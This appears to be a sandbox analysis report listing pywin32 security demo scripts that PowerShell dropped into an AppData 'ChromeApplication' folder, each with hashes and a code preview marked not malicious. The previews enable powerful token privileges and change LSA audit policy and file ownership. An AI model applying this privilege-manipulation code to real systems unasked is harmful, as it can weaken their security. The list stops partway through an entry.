                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32file.import win32security..policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)..## mod_nbr, mod_time = win32security.LsaQueryInformationPolicy(policy_handle,win32security.PolicyModificationInformation).## print mod_nbr, mod_time..(. domain_name,. dns_domain_name,. dns_forest_name,. domain_guid,. domain_sid,.) = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyDnsDomainInformation.).print(domain_name, dns_domain_name, dns_forest_name, domain_guid, domain_sid)..event_audit_info = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation.).print(event_audit_info)..domain_name, sid = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyPrimaryDomainInformation.).print(domain_name, sid)..domain_name, sid = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAccou

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\list_rights.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1142
                                                                                                                                                                                                  Entropy (8bit):5.222962792869748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1hmZwhp2hVJhBhh/zznnPUMSdDabSsQZ8Nn:13hcrJnhJ3nnPPSN88qn
                                                                                                                                                                                                  MD5:3C91061F858441D3452E1DF39EA29436
                                                                                                                                                                                                  SHA1:1F0B24F95ADB0023492501653F89647D4AA4AE1F
                                                                                                                                                                                                  SHA-256:68A481C6BCD6FCDA88A0C957BFDF2CEFDAEE895E4FD1E61C00FF24792095A883
                                                                                                                                                                                                  SHA-512:64C9FA96B29218FE2E8F408633A4E4F76A4B2D5167DE27B4DBA5B11C357D6AA80313C6C5E6079FD77F453C1FD6021DE13BEDDEE61EE0373FF8F4E35FCD0A0152
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),. win32con.SE_PRIVILEGE_ENABLED,. ), ##doesn't seem to be in ntsecuritycon.py ?.)..ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS.) ##win32con.TOKEN_ADJUST_PRIVILEGES).win32security.AdjustTokenPrivileges(th, 0, new_privs)..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS)..sidlist = win32security.LsaEnumerateAccountsWithUserRight(. policy_handle,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\localized_names.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2014
                                                                                                                                                                                                  Entropy (8bit):4.963463813027583
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:5mRAZ3dglAepb18kfCy6Tq/wjRRzCNXd4mskDTq/deI3YG9P1Oi:5mmVdgR85MwjRRzCAfKMdbYG99Oi
                                                                                                                                                                                                  MD5:42D316038232ACEB8893229577D4388C
                                                                                                                                                                                                  SHA1:100EDC412265A66533472CC3117FCCB93866E1E2
                                                                                                                                                                                                  SHA-256:774AA56DBC4A7E982740EF586FC1A12584591D8B5EACC00E9E7FCEE81691A3B0
                                                                                                                                                                                                  SHA-512:0502AB71542AE07E451BE1EBCBE8755785D915F1F1AB16D3181EB03FB359A17353418767EEC64F5AB66B20EB41C97977B244EAEA32FBA8CB237D3AAA2556D71F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A Python port of the MS knowledge base article Q157234.# "How to deal with localized and renamed user and group names".# http://support.microsoft.com/default.aspx?kbid=157234..import sys..import pywintypes.from ntsecuritycon import *.from win32net import NetUserModalsGet.from win32security import LookupAccountSid...def LookupAliasFromRid(TargetComputer, Rid):. # Sid is the same regardless of machine, since the well-known. # BUILTIN domain is referenced.. sid = pywintypes.SID(). sid.Initialize(SECURITY_NT_AUTHORITY, 2).. for i, r in enumerate((SECURITY_BUILTIN_DOMAIN_RID, Rid)):. sid.SetSubAuthority(i, r).. name, domain, typ = LookupAccountSid(TargetComputer, sid). return name...def LookupUserGroupFromRid(TargetComputer, Rid):. # get the account domain Sid on the target machine. # note: if you were looking up multiple sids based on the same. # account domain, only need to call this once.. umi2 = NetUserModalsGet(TargetComputer, 2). domain_sid

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\lsaregevent.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):532
                                                                                                                                                                                                  Entropy (8bit):4.892813022065808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:4LeLhsLM5eLUSWKUHXAV/FTMNFSs4PNLAXKCJZplNPQM3AV/Fp:Z9c10HXAQFSflUzXplNxA1
                                                                                                                                                                                                  MD5:7FE72D1C66C68BF2236E8E5B4E06AD82
                                                                                                                                                                                                  SHA1:EAC9ACD7D5E552EDBC404028CAA862CD39574F23
                                                                                                                                                                                                  SHA-256:635057C3AFDD79AA63C70008E849DBE16DE3C3F0C42E46756AD66B3AC8B3A555
                                                                                                                                                                                                  SHA-512:FFC8ECB562BA19C51885C3BDFC7DFAEE8C76BF548E7F947B9637BAB7CAB7FD8384BED963EB3D62915ADDBA672AE283BCF25AD752F582E8DF762E014457B0711B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32event.import win32security..evt = win32event.CreateEvent(None, 0, 0, None).win32security.LsaRegisterPolicyChangeNotification(. win32security.PolicyNotifyAuditEventsInformation, evt.).print("Waiting for you change Audit policy in Management console ...").ret_code = win32event.WaitForSingleObject(evt, 1000000000).## should come back when you change Audit policy in Management console ....print(ret_code).win32security.LsaUnregisterPolicyChangeNotification(. win32security.PolicyNotifyAuditEventsInformation, evt.).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\lsastore.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):4.864220721097227
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:4LM8ahSBkwMouLHPooPWBJvFlqo+/vokBLn5SWPooSK+wZ9vn:0aMXuUo+jv7avxUoZNn
                                                                                                                                                                                                  MD5:39AC2663BCC3306EC873C140CAE98CD7
                                                                                                                                                                                                  SHA1:DE14DA2DCEA2D2DCCC06323E81C2C4A58602CD36
                                                                                                                                                                                                  SHA-256:737176D134E0A8117D2AB9539CAB55D7D30BCF7E2ADD7F7C6B3BF65409B8256F
                                                                                                                                                                                                  SHA-512:6F72B6911C916E7DE0FC27F57618464150A2A1934E427B8BBFE1131EC574FFA6619AED33E1583520140B0B66DFB039329B0683AF0FBCD8965B6223A3E54108B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32security..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS).privatedata = "some sensitive data".keyname = "tmp".win32security.LsaStorePrivateData(policy_handle, keyname, privatedata).retrieveddata = win32security.LsaRetrievePrivateData(policy_handle, keyname).assert retrieveddata == privatedata..## passing None deletes key.win32security.LsaStorePrivateData(policy_handle, keyname, None).win32security.LsaClose(policy_handle).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\query_information.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):791
                                                                                                                                                                                                  Entropy (8bit):4.8217987561958005
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:4LzLM4L7+hpoS4ZfpKlzl4ryZCSYyGLPhs0KGbG+Jpt4eWd3uvaCTJTF72pOM:KujqM1l4yHY7sHKvJptn5NTJFipf
                                                                                                                                                                                                  MD5:36AE55ECA7E61DD9D9A9EB3CE6634D26
                                                                                                                                                                                                  SHA1:E8D7F767A8C2F23A7550EC885A9CD2E631D01068
                                                                                                                                                                                                  SHA-256:DFB854F3D6FFBCC306FA74A9F88DAAE17C669C018D1E4A40AD939DA9F497D043
                                                                                                                                                                                                  SHA-512:357D4D360A781292C9DDD89149A446A1909B0DEF0EBE38087A37B3C3F86F708548089B994BF3EFC3953171E44D02C690956848AFEF796EB5D12E303BEF034036
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32security.import winerror.from ntsecuritycon import *...# This is a Python implementation of win32api.GetDomainName().def GetDomainName():. try:. tok = win32security.OpenThreadToken(win32api.GetCurrentThread(), TOKEN_QUERY, 1). except win32api.error as details:. if details[0] != winerror.ERROR_NO_TOKEN:. raise. # attempt to open the process token, since no thread token. # exists. tok = win32security.OpenProcessToken(win32api.GetCurrentProcess(), TOKEN_QUERY). sid, attr = win32security.GetTokenInformation(tok, TokenUser). win32api.CloseHandle(tok).. name, dom, typ = win32security.LookupAccountSid(None, sid). return dom...if __name__ == "__main__":. print("Domain name is", GetDomainName()).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\regsave_sa.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1690
                                                                                                                                                                                                  Entropy (8bit):5.320880029428467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Z57cjK3KmpnnPkS3NothAlWfwuMJXej9P7:z7cjYKmpPpdiPUF4x7
                                                                                                                                                                                                  MD5:6839DCBAFD537FCD03128D64D6DDAF88
                                                                                                                                                                                                  SHA1:1230CA9595A5556C8BEFD6E7F343499F86634C95
                                                                                                                                                                                                  SHA-256:7AE2098259C3EE6535460E061202B7345E6884EF561231E4D8505DA90A573554
                                                                                                                                                                                                  SHA-512:97A5744424DCC879947F10FC1A375CCA988A5A49A486D53744223ED64AC9E00F94731D4A033BB47EFF69432265CE8F091858C5DEC43C4B84D5EE42A8FAA17E09
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:fname = "h:\\tmp.reg"..import os..import ntsecuritycon.import pywintypes.import win32api.import win32con.import win32security..## regsave will not overwrite a file.if os.path.isfile(fname):. os.remove(fname)..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.).win32security.AdjustTokenPrivileges(th, 0, new_privs).my_sid = win32security.GetTokenInformation(th, ntse

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\regsecurity.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1121
                                                                                                                                                                                                  Entropy (8bit):5.34664595251249
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:14p2hdh8pnnPkShpotD3aWwHVsfrJKT/MAbhcgWGQRTv:14cjmpnnPkSHot2GfdEMAbhcgWr9
                                                                                                                                                                                                  MD5:2C220CB380A755404147D2E3BA4C5011
                                                                                                                                                                                                  SHA1:8FC74D6B17D8ABE8B70F9B2A2253D1D945B6F2FE
                                                                                                                                                                                                  SHA-256:F7F632E99DBDE61350D2A3184AE49DE93FF288D087EEA9221476B1487947F095
                                                                                                                                                                                                  SHA-512:BC1DB9C209C723BC943C13888CE202282E24E30105433304017CD22F9DD7DE852F895AA973D01C559B492184B82B7761304B53B065D07A244559C437FDCAB6D9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32con.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.)..win32security.AdjustTokenPrivileges(th, 0, new_privs).hkey = win32api.RegOpenKey(. win32con.HKEY_LOCAL_MACHINE, None, 0, win32con.KEY_ALL_ACCESS.).win32api.RegCreateKey(hkey, "SYSTEM\\NOTMP").notmpkey = win32api.RegOpenKey(. hkey, "SYSTEM\\notmp", 0, win32con.ACCESS_SYSTEM_SECURITY.)..tmp_sid = win32security.LookupAccountName("", "tmp")[0].sacl = win32security.ACL().sacl.AddAuditAccessAce(win32security.ACL_REVISION, win32con.GENERIC_ALL, tmp_sid, 1, 1)..sd = win32security.SECURITY_DESCRIPTOR

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\sa_inherit.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                  Entropy (8bit):5.121297598616513
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:kRWL/ReuCjpEBXVjRRBxarV24/2lgHg1g3/2lCRBLnH:kwLMuCyFjRMrVV+lgIgulOr
                                                                                                                                                                                                  MD5:585C9D69157820F89A295C77539CC0A7
                                                                                                                                                                                                  SHA1:2BF372C54C793C22FD252A31687F20B32ED1D40E
                                                                                                                                                                                                  SHA-256:07368D5693F1F59A9A75B0B8019622EF0C13686CF769F7A6FCF11C8298F9D6B7
                                                                                                                                                                                                  SHA-512:531A9CB035B034D5A51207FE39FA458D47E5AFF76A13B750AD4F9C4FD13E8E45A57EF9D1D39132D8699D39459204D255A773428C9509481A3E4DA4F0A3F9B3E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import pywintypes.import win32security..sa = pywintypes.SECURITY_ATTRIBUTES().tmp_sid = win32security.LookupAccountName("", "tmp")[0].sa.SetSecurityDescriptorOwner(tmp_sid, 0).sid = sa.SECURITY_DESCRIPTOR.GetSecurityDescriptorOwner().print(win32security.LookupAccountSid("", sid)).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\security_enums.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9455
                                                                                                                                                                                                  Entropy (8bit):5.099713879626992
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:obgfeul5n5WEfqvrV9f0V2dVElGv6/cAc1lFblMQ/1978KOeVb21BbeAqlbxN4xT:o/fl2x
                                                                                                                                                                                                  MD5:1022B8A344444AE8ED0CE8B28B63B356
                                                                                                                                                                                                  SHA1:89F0A09E8B9A4BE32C6062F42BE4ABE7115BD6F2
                                                                                                                                                                                                  SHA-256:91BA21A23BF7AB044F49A8E7E7264ACFF0109DE3281D30969BED0FFCFE4FC6B0
                                                                                                                                                                                                  SHA-512:2706E6EDC6983E86BFA1CDF6777881254ABBF7359CF41D74D68C7E586E0DE294576F6F4DEB7628155CC339E2155A8D41E2137291B2AA22BBB6A75C1AA8565EE9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32security.import winnt...class Enum:. def __init__(self, *const_names):. """Accepts variable number of constant names that can be found in either. win32security, ntsecuritycon, or winnt.""". for const_name in const_names:. try:. const_val = getattr(win32security, const_name). except AttributeError:. try:. const_val = getattr(ntsecuritycon, const_name). except AttributeError:. try:. const_val = getattr(winnt, const_name). except AttributeError:. raise AttributeError(. 'Constant "%s" not found in win32security, ntsecuritycon, or winnt.'. % const_name. ). setattr(self, const_name, const_val).. def lookup_name(self, const_val):. """Looks up the name of a particular value.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\set_file_audit.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3372
                                                                                                                                                                                                  Entropy (8bit):5.295959335066199
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:J+cKmpPpEf/gnFU3KSb5a89KmZywFVF1f1isGGoa:JzKmVp50b/tV
                                                                                                                                                                                                  MD5:2DB725B308FF772F50BC84EF9809EE40
                                                                                                                                                                                                  SHA1:86ED4BA5FCE949AFCBCA967733867231A023521A
                                                                                                                                                                                                  SHA-256:DBC8B5F7C6D4F28D6506703A110BBD452FB4231B4127281223A44D8E79CE5CFC
                                                                                                                                                                                                  SHA-512:ABAB163113EE68A20BF70B1A89BF01CF3A4EC512F0299B671BF68DBC48BD62F41E052AB8C3EA1EA02C96973A2DF62F51B0BA27BB3A11BE55A20F3B093FC7E89E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from win32security import (. ACL_REVISION_DS,. CONTAINER_INHERIT_ACE,. DACL_SECURITY_INFORMATION,. GROUP_SECURITY_INFORMATION,. OBJECT_INHERIT_ACE,. OWNER_SECURITY_INFORMATION,. PROTECTED_DACL_SECURITY_INFORMATION,. SACL_SECURITY_INFORMATION,. SE_FILE_OBJECT,.)..## SE_SECURITY_NAME needed to access SACL, SE_RESTORE_NAME needed to change owner to someone other than yourself.new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.).modified_privs = win32security.AdjustTokenPrivileges(th, 0, new_privs

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\set_file_owner.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2258
                                                                                                                                                                                                  Entropy (8bit):5.257866200243561
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:xIhkp2h2hdh8hLhVJhBhh/zznnPkSubzUrxL+5JwcyM2iUrEkI0B:K2cYjK5rJnhJ3nnPkSqwwXwcyMXUIE
                                                                                                                                                                                                  MD5:FDFAC9188A86C2D91EC792520151731A
                                                                                                                                                                                                  SHA1:CB6EF5643BF3DBCA85EF4001215ABDDECC14D0B3
                                                                                                                                                                                                  SHA-256:CDC4E5B7AE77D537E930D42288E2DA434FB5C7AE2E8FCF6F6CAB433E62100228
                                                                                                                                                                                                  SHA-512:CB0A01D281A0C9D8E273F0D16D3364BE61A034233485B86471FB466DD4151EFDBE3750FED7BD8EC5DD12C29129EF8B93A873BF878A0D58B3B0A6E35C378EB3CC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:fname = r"h:\tmp.txt"..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegatio

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\set_policy_info.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):965
                                                                                                                                                                                                  Entropy (8bit):5.211924428673646
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1dVaWGkiQ+MpbSBWxGftBaIftBNIfWwr12rNn:1ztpSBHBacBN1A2Bn
                                                                                                                                                                                                  MD5:ECF5691E717B094357E941118E31434C
                                                                                                                                                                                                  SHA1:A6749854996DB82308E0D8C0A3AC1372FC67FF48
                                                                                                                                                                                                  SHA-256:E5D33C48D397F60FF60F9A5C6F0425C4FB2A8669320C8D14ACF4F430C239440A
                                                                                                                                                                                                  SHA-512:3426EE7152F575B329E24B6F2D7FD5C8044DDBDB3A63108235813F523C77020C0303F5F0ED1F25914BF908648F1183700695C728384B41D2225BE4799D11E80F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32file.import win32security..policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)..event_audit_info = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation.).print(event_audit_info)..new_audit_info = list(event_audit_info[1]).new_audit_info[win32security.AuditCategoryPolicyChange] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.).new_audit_info[win32security.AuditCategoryAccountLogon] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.).new_audit_info[win32security.AuditCategoryLogon] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.)..win32security.LsaSetInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation, (1, new_audit_info).)..win32security.LsaClose(policy_handle).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\setkernelobjectsecurity.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4917
                                                                                                                                                                                                  Entropy (8bit):5.272689420786585
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Yrcny/jWiv5k/IDkdU/pqyaai78ziK9DJarxYlf7h8xl:Y+y/jWiv5k/Igwq8x+KumZel
                                                                                                                                                                                                  MD5:EF8021AF7913DDA04DDF02F2C0DE7C23
                                                                                                                                                                                                  SHA1:00BC54F54DCBB9A5A24DE537941BC25DD4AA7C13
                                                                                                                                                                                                  SHA-256:4B7C41345F179C949CB6EF6014B170B85CAEF1E85815AFAD4B6EE702361159AA
                                                                                                                                                                                                  SHA-512:38F53067622A35A712FFAFE44472563A9052B822BB370AF6844896792C1A39D0E23797065EFE00EAA9F74614BFDB1B8F9B9A924D0487D4B70F81DE26C83D63AD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivileg

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\setnamedsecurityinfo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4392
                                                                                                                                                                                                  Entropy (8bit):5.2487634042183835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Snqrcny/jWiv5k/IDkdAqI08Jarx+LwfGfyh8u:h+y/jWiv5k/IgWqHjjj
                                                                                                                                                                                                  MD5:4ABA1E68BAC79456F9C3A0609712D9EB
                                                                                                                                                                                                  SHA1:A9D86A09BBCD2AF8380189B71614A22501EE6351
                                                                                                                                                                                                  SHA-256:7E1144512E75466D6BE8CE265F88CBB33EB0FB5F3D6EDACEA99F1317A2FF98E1
                                                                                                                                                                                                  SHA-512:A0316A045611F4270245766BF712D6378F4BCC38203760834075CE5854D60F95F71B6618C758D455D19DB1C736A7FE8C379D31BFF4F8D449EFC90BB7EC58DDE9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..fname, tmp = win32api.GetTempFileName(win32api.GetTempPath(), "tmp").print(fname).## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\setsecurityinfo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4541
                                                                                                                                                                                                  Entropy (8bit):5.258881603906181
                                                                                                                                                                                                  Encrypted:false
